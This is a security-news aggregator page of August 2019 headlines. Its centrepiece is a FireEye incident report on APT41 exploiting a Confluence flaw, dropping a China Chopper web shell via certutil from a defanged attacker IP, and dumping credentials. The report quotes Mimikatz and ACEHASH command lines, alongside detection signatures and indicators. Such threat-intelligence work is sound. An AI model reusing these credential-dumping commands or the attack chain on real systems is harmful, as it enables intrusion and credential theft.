Port 22

Forced Password Reset? Check Your Assumptions
August 21, 2019

Almost weekly now I hear from an indignant reader who suspects a data breach at a Web site they frequent that has just asked the reader to reset their password. Further investigation almost invariably reveals that the password reset demand was not the result of a breach but rather the site’s efforts to identify customers who are reusing passwords from other sites that have already been hacked.

But ironically, many companies taking these proactive steps soon discover that their explanation as to why they’re doing it can get misinterpreted as more evidence of lax security. This post attempts to unravel what’s going on here.

Google and Mozilla Block Kazakhstans Root CA Certificates to Prevent Spying
August 21, 2019

In a move to protect its users based in Kazakhstan from government surveillance, Google and Mozilla finally today came forward and blocked Kazakhstan’s government-issued root CA certificate within their respective web browsing software.

Starting today, Firefox and Chrome users in Kazakhstan will see an error message stating that the certificate should not be trusted when attempting to access

Russian Hacking Group Targeting Banks Worldwide With Evolving Tactics
August 21, 2019

Silence APT, a Russian-speaking cybercriminal group, known for targeting financial organizations primarily in former Soviet states and neighboring countries is now aggressively targeting banks in more than 30 countries across America, Europe, Africa, and Asia.

Active since at least September 2016, Silence APT group’s most recent successful campaign was against Bangladesh-based Dutch-Bangla

Use This Privacy Tool to View and Clear Your 'Off-Facebook Activity' Data
August 20, 2019

Well, here we have great news for Facebook users, which is otherwise terrible for marketers and publishers whose businesses rely on Facebook advertisement for re-targeted conversations.

Following the Cambridge Analytica scandal, Facebook has taken several privacy measures in the past one year with an aim to give its users more control over their data and transparency about how the social

Surveillance as a Condition for Humanitarian Aid
August 20, 2019

Excellent op-ed on the growing trend to tie humanitarian aid to surveillance. Despite the best intentions, the decision to deploy technology like biometrics is built on a number of unproven assumptions, such as, technology solutions can fix deeply embedded political problems. And that auditing for fraud requires entire populations to be tracked using their personal data. And that experimental technologies…

Zebra Industrial Printers
August 20, 2019

This advisory includes mitigations for an insufficiently protected credentials vulnerability in Zebra's Industrial Printers.

iOS 12.4 jailbreak released after Apple accidentally un-patches an old flaw
August 20, 2019

A fully functional jailbreak has been released for the latest iOS 12.4 on the Internet, making it the first public jailbreak in a long timethanks to Apple.

Dubbed “unc0ver 3.5.0,” the jailbreak works with the updated iPhones, iPads and iPod Touches by leveraging a vulnerability that Apple previously patched in iOS 12.3 but accidentally reintroduced in the latest iOS version 12.4.

5 Ways to Improve the Patching Process
August 20, 2019

So many software vulnerabilities, so little time. But failure to patch them can have serious consequences. Here’s help for overwhelmed security teams.

How Activity Logs Help WordPress Admins Better Manage Website Security
August 20, 2019

Managing a WordPress website can sap a lot of your time and energy, which otherwise you’d spend on managing your business.

If you’re looking to cut down on the hours, you spend troubleshooting WordPress technical and security problems, better managing and monitoring your website and users, or your customers, you need a WordPress activity log plugin.

This post explains how to use the WP

Hackers Planted Backdoor in Webmin, Popular Utility for Linux/Unix Servers
August 20, 2019

Following the public disclosure of a critical zero-day vulnerability in Webmin last week, the project’s maintainers today revealed that the flaw was not actually the result of a coding mistake made by the programmers.

Instead, it was secretly planted by an unknown hacker who successfully managed to inject a backdoor at some point in its build infrastructurethat surprisingly persisted into

GAME OVER: Detecting and Stopping an APT41 Operation
August 19, 2019

In August 2019, FireEye released the Double Dragon report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponzing and exploiting within a matter of days.

Our knowledge of this groups targets and activities are rooted in our Incident Response and Managed Defense services, where we encounter actors like APT41 on a regular basis. At each encounter, FireEye works to reverse malware, collect intelligence and hone our detection capabilities. This ultimately feeds back into our Managed Defense and Incident Response teams detecting and stopping threat actors earlier in their campaigns.

In this blog post, were going to examine a recent instance where FireEye Managed Defense came toe-to-toe with APT41. Our goal is to display not only how dynamic this group can be, but also how the various teams within FireEye worked to thwart attacks within hours of detection protecting our clients networks and limiting the threat actors ability to gain a foothold and/or prevent data exposure.

GET TO DA CHOPPA!

In April 2019, FireEyes Managed Defense team identified suspicious activity on a publicly-accessible web server at a U.S.-based research university. This activity, a snippet of which is provided in Figure 1, indicated that the attackers were exploiting CVE-2019-3396, a vulnerability in Atlassian Confluence Server that allowed for path traversal and remote code execution.


Figure 1: Snippet of PCAP showing attacker attempting CVE-2019-3396 vulnerability

This vulnerability relies on the following actions by the attacker:

  • Customizing the _template field to utilize a template that allowed for command execution.
  • Inserting a cmd field that provided the command to be executed.

Through custom JSON POST requests, the attackers were able to run commands and force the vulnerable system to download an additional file. Figure 2 provides a list of the JSON data sent by the attacker.


Figure 2: Snippet of HTTP POST requests exploiting CVE-2019-3396

As shown in Figure 2, the attacker utilized a template located at hxxps[:]//github[.]com/Yt1g3r/CVE-2019-3396_EXP/blob/master/cmd.vm. This publicly-available template provided a vehicle for the attacker to issue arbitrary commands against the vulnerable system. Figure 3 provides the code of the file cmd.vm.


Figure 3: Code of cmd.vm, used by the attackers to execute code on a vulnerable Confluence system

The HTTP POST requests in Figure 2, which originated from the IP address 67.229.97[.]229, performed system reconnaissance and utilized Windows certutil.exe to download a file located at hxxp[:]//67.229.97[.]229/pass_sqzr.jsp and save it as test.jsp (MD5: 84d6e4ba1f4268e50810dacc7bbc3935). The file test.jsp was ultimately identified to be a variant of a China Chopper webshell.

A Passive Aggressive Operation

Shortly after placing test.jsp on the vulnerable system, the attackers downloaded two additional files onto the system:

  • 64.dat (MD5: 51e06382a88eb09639e1bc3565b444a6)
  • Ins64.exe (MD5: e42555b218248d1a2ba92c1532ef6786)

Both files were hosted at the same IP address utilized by the attacker, 67[.]229[.]97[.]229. The file Ins64.exe was used to deploy the HIGHNOON backdoor on the system. HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy one of two embedded drivers to conceal network traffic and communicate with its command and control server to download and launch memory-resident DLL plugins. This particular variant of HIGHNOON is tracked as HIGHNOON.PASSIVE by FireEye. (An exploration of passive backdoors and more analysis of the HIGHNOON malware family can be found in our full APT41 report).

Within the next 35 minutes, the attackers utilized both the test.jsp web shell and the HIGHNOON backdoor to issue commands to the system. As China Chopper relies on HTTP requests, attacker traffic to and from this web shell was easily observed via network monitoring. The attacker utilized China Chopper to perform the following:

  • Movement of 64.dat and Ins64.exe to C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Users

Additionally, FireEyes FLARE team reverse engineered the custom protocol utilized by the HIGHNOON backdoor, allowing us to decode the attackers traffic. Figure 4 provides a list of the various commands issued by the attacker utilizing HIGHNOON.


Figure 4: Decoded HIGHNOON commands issued by the attacker

Playing Their ACEHASH Card

As shown in Figure 4, the attacker utilized the HIGHNOON backdoor to execute a PowerShell command that downloaded a script from PowerSploit, a well-known PowerShell Post-Exploitation Framework. At the time of this blog post, the script was no longer available for downloading. The commands provided to the script privilege::debug sekurlsa::logonpasswords exit exit indicate that the unrecovered script was likely a copy of Invoke-Mimikatz, reflectively loading Mimikatz 2.0 in-memory. Per the observed HIGHNOON output, this command failed.

After performing some additional reconnaissance, the attacker utilized HIGHNOON to download two additional files into the C:\Program Files\Atlassian\Confluence directory:

  • c64.exe (MD5: 846cdb921841ac671c86350d494abf9c)
  • F64.data (MD5: a919b4454679ef60b39c82bd686ed141)

These two files are the dropper and encrypted/compressed payload components, respectively, of a malware family known as ACEHASH. ACEHASH is a credential theft and password dumping utility that combines the functionality of multiple tools such as Mimikatz, hashdump, and Windows Credential Editor (WCE).

Upon placing c64.exe and F64.data on the system, the attacker ran the command

c64.exe f64.data "9839D7F1A0 -m

This specific command provided a password of 9839D7F1A0 to decrypt the contents of F64.data, and a switch of -m, indicating the attacker wanted to replicate the functionality of Mimikatz. With the correct password provided, c64.exe loaded the decrypted and decompressed shellcode into memory and harvested credentials.

Ultimately, the attacker was able to exploit a vulnerability, execute code, and download custom malware on the vulnerable Confluence system. While Mimikatz failed, via ACEHASH they were able to harvest a single credential from the system. However, as Managed Defense detected this activity rapidly via network signatures, this operation was neutralized before the attackers progressed any further.

Key Takeaways From This Incident

  • APT41 utilized multiple malware families to maintain access into this environment; impactful remediation requires full scoping of an incident.
  • For effective Managed Detection & Response services, having coverage of both Endpoint and Network is critical for detecting and responding to targeted attacks.
  • Attackers may weaponize vulnerabilities quickly after their release, especially if they are present within a targeted environment. Patching of critical vulnerabilities ASAP is crucial to deter active attackers.

Detecting the Techniques

FireEye detects this activity across our platform, including detection for certutil usage, HIGHNOON, and China Chopper.

Detection

Signature Name

China Chopper

FE_Webshell_JSP_CHOPPER_1

FE_Webshell_Java_CHOPPER_1

FE_Webshell_MSIL_CHOPPER_1

HIGHNOON.PASSIVE

FE_APT_Backdoor_Raw64_HIGHNOON_2

FE_APT_Backdoor_Win64_HIGHNOON_2

Certutil Downloader

CERTUTIL.EXE DOWNLOADER (UTILITY)

CERTUTIL.EXE DOWNLOADER A (UTILITY)

ACEHASH

FE_Trojan_AceHash

Indicators

Type

Indicator

MD5 Hash (if applicable)

File

test.jsp

84d6e4ba1f4268e50810dacc7bbc3935

File

64.dat

51e06382a88eb09639e1bc3565b444a6

File

Ins64.exe

e42555b218248d1a2ba92c1532ef6786

File

c64.exe

846cdb921841ac671c86350d494abf9c

File

F64.data

a919b4454679ef60b39c82bd686ed141

IP Address

67.229.97[.]229

N/A

Looking for more? Join us for a webcast on August 29, 2019 where we detail more of APT41s activities. You can also find a direct link to the public APT41 report here.

Acknowledgements

Thanks to Raymond Leong of Advanced Practices and Willi Ballenthin of FLAREfor identification and reversing of the HIGHNOON.PASSIVE malware.

The Rise of Bulletproof Residential Networks
August 19, 2019

Cybercrooks increasingly are anonymizing their malicious traffic by routing it through residential broadband and wireless data connections. Most often, those connections are hacked computers, mobile phones, or home routers. But this is the story of a sprawling “bulletproof residential VPN” service that appears to have been built by acquiring chunks of Internet addresses from some the largest ISPs and mobile data providers in the United States and abroad.

Uncovering a MyKings Variant With Bootloader Persistence via Managed Detection and Response
August 19, 2019

When we first investigated MyKings in 2017, we focused on how the cryptominer-dropping botnet malware usedWMI for persistence. Like Mirai, MyKings seems to be constantly undergoing changes to its infection routine. The variant we analyzed for this incident did not just have a single method of retaining persistence but multiple ones, as discussed in the previous section. In addition to WMI, it also used the registry, the task scheduler, and a bootkit the most interesting of which is the bootkit.

The post Uncovering a MyKings Variant With Bootloader Persistence via Managed Detection and Response appeared first on .

Influence Operations Kill Chain
August 19, 2019

Influence operations are elusive to define. The Rand Corp.’s definition is as good as any: “the collection of tactical information about an adversary as well as the dissemination of propaganda in pursuit of a competitive advantage over an opponent.” Basically, we know it when we see it, from bots controlled by the Russian Internet Research Agency to Saudi attempts to…

IT threat evolution Q2 2019. Statistics
August 19, 2019

Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe, 217,843,293 unique URLs triggered Web Anti-Virus components.

Friday Squid Blogging: Robot Squid Propulsion
August 16, 2019

Interesting research: The squid robot is powered primarily by compressed air, which it stores in a cylinder in its nose (do squids have noses?). The fins and arms are controlled by pneumatic actuators. When the robot wants to move through the water, it opens a value to release a modest amount of compressed air; releasing the air all at once…

Adware Posing as 85 Photography and Gaming Apps on Google Play Installed Over 8 Million Times
August 16, 2019

The mobile platform is ubiquitous enabling users to make online transactions, run their everyday lives, or even use it in the workplace. Its no surprise that fraudsters and cybercriminals would want to cash in on it. Delivering adware, for example, enables them to monetize affected devices while attempting to be innocuous. And while they may be viewed as a nuisance at best, mobile ad fraud- and adware-related incidents became so rampant last year that it cost businesses hefty financial losses.

The post Adware Posing as 85 Photography and Gaming Apps on Google Play Installed Over 8 Million Times appeared first on .

Software Vulnerabilities in the Boeing 787
August 16, 2019

Boeing left its software unprotected, and researchers have analyzed it for vulnerabilities: At the Black Hat security conference today in Las Vegas, Santamarta, a researcher for security firm IOActive, plans to present his findings, including the details of multiple serious security flaws in the code for a component of the 787 known as a Crew Information Service/Maintenance System. The CIS/MS…

Page 1 of 99 Older Posts →